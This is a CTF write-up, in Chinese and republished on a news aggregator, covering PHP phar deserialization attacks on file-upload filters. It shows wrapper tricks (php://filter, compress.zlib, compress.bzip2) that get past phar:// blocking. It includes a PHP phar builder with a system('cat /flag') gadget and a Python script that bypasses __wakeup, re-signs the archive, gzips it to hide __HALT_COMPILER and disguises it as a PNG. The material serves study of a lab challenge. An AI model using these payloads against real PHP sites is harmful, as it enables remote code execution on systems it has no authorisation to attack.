返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >phar文件上传的骚姿势(绕过phar、_HALT)
  • 711
分享到

phar文件上传的骚姿势(绕过phar、_HALT)

php服务器java 2023-09-05 06:09:38 711人浏览 薄情痞子
摘要

前面也讲过一次phar文件上传的东西,但是那都是过滤比较低,仅仅过滤了后缀。 知道今天看到了一篇好的文章 如果过滤了phar这个伪造协议的话,那还是比较简单的 if (preg_match("/^PHP|^file|^phar|^dic

前面也讲过一次phar文件上传的东西,但是那都是过滤比较低,仅仅过滤了后缀。

知道今天看到了一篇好的文章

如果过滤了phar这个伪造协议的话,那还是比较简单的

if (preg_match("/^PHP|^file|^phar|^dict|^zip/i",$filename){
    die();
}例如这样进行了过滤

绕过的话,我们可以用各种协议进行绕过

php://filter/read=convert.base64-encode/resource=phar://test.phar
//即使用filter伪协议来进行绕过
2、compress.bzip2://phar:///test.phar/test.txt
//使用bzip2协议来进行绕过
3、compress.zlib://phar:///home/sx/test.phar/test.txt
//使用zlib协议进行绕过 

二、当如果__HALT_COMPILER被过滤了

PHP通过__HALT_COMPILER来识别Phar文件,那么出于安全考虑,即为了防止Phar反序列化的出现,可能就会对这个进行过滤,示例代码如下 

因为phar是通过这个来判断是不是phar文件,而不是通过后缀来判断,所以我们可以随便的更改后缀而不会影响效果

这里的办法:是将生成的Phar文件进行gzip压缩

gzip test.phar

cat test.phar.gz

例题:

[NSSRound#4 SWPU]1zWEB

 打开题目以后,第一眼只是觉得是上传文件的漏洞,可是上传都不太行。

让我改变了一个思维,试了一下 /flag万一呢,eee

竟然出了,那就看看下一道进阶题,估计是出题人忽略了这个

[NSSRound#4 SWPU]1zweb(revenge) 

这道题出题人就进行了限制

 因为是前提的一个提示,所以我觉得也不会是单纯的文件上传漏洞

这时候试一下/etc/passwd,有没有任意文件读取漏洞,前面做过的一道题用到了这个。

果然有,那就读取一下源码index.php,和upload.php上传文件

 0){    echo "上传异常";}else{    $allowedExts = array("gif", "jpeg", "jpg", "png");    $temp = explode(".", $_FILES["file"]["name"]);    $extension = end($temp);    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){        $content=file_get_contents($_FILES["file"]["tmp_name"]);        $pos = strpos($content, "__HALT_COMPILER();");        if(gettype($pos)==="integer"){            echo "ltj一眼就发现了phar";        }else{            if (file_exists("./upload/" . $_FILES["file"]["name"])){                echo $_FILES["file"]["name"] . " 文件已经存在";            }else{                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");                fwrite($myfile, $content);                fclose($myfile);                echo "上传成功 ./upload/".$_FILES["file"]["name"];            }        }    }else{        echo "dky不喜欢这个文件 .".$extension;    }}?>

 限制了后缀只能是,gif,jpeg,jpg,png格式,并且过滤了HALT_COMPILER(), 所以这道题的考点就是绕过这个

ljt="ljt";        $this->dky="dky";        phpinfo();    }    public function __destruct(){        if($this->ljt==="Misc"&&$this->dky==="Re")            eval($this->cmd);    }    public function __wakeup(){        $this->ljt="Re";        $this->dky="Misc";    }}$file=$_POST['file'];if(isset($_POST['file'])){    if (preg_match("/flag/", $file)) {    die("nonono");    }    echo file_get_contents($file);}

这个反序列化,是简单的,仅仅是绕过wakeup就可以,考点并不在这里,发现没有serialize这个的参数,而且有文件上传并且file_get_contents可以触发phar序列化,所以确定了需要phar.

 

这里就出现了一个问题,phar如何绕过wakeup呢,如何把属性值加1呢,我们先不考虑这些,先写出phar 文件来

ljt="Misc";        $this->dky="Re";        $this->cmd="system('cat /flag');";    }}$phar = new Phar('quan9i.phar');$phar->startBuffering();$phar->setStub('GIF89a'.'');$a = new LoveNss();$phar->setMetadata($a);$phar->addFromString('test.txt', 'test');$phar->stopBuffering();?>

这个比较简单,就直接过了,然后就需要考虑我们以上的问题了

import gzipfrom hashlib import sha1with open('D:\\phpstudy\\quan9i.phar', 'rb') as file:    f = file.read()s = f[:-28] # 获取要签名的数据s = s.replace(b'3:{', b'4:{')#更换属性值,绕过__wakeuph = f[-8:] # 获取签名类型以及GBMB标识newf = s + sha1(s).digest() + h # 数据 + 签名 + (类型 + GBMB)#print(newf)newf = gzip.compress(newf) #对Phar文件进行gzip压缩with open('D:\\phpStudy\\newquanqi.png', 'wb') as file:#更改文件后缀    file.write(newf)

 找到我们生成phar的文件目录,只读

因为我们改变了phar里面的内容,wakeup属性值,所以需要重新生成一个标签

 就会直接生成一个png的文件,我们直接上传然后phar协议读取

 

来源地址:https://blog.csdn.net/qq_62046696/article/details/127195593

--结束END--

本文标题: phar文件上传的骚姿势(绕过phar、_HALT)

本文链接: https://lsjlt.com/news/394850.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作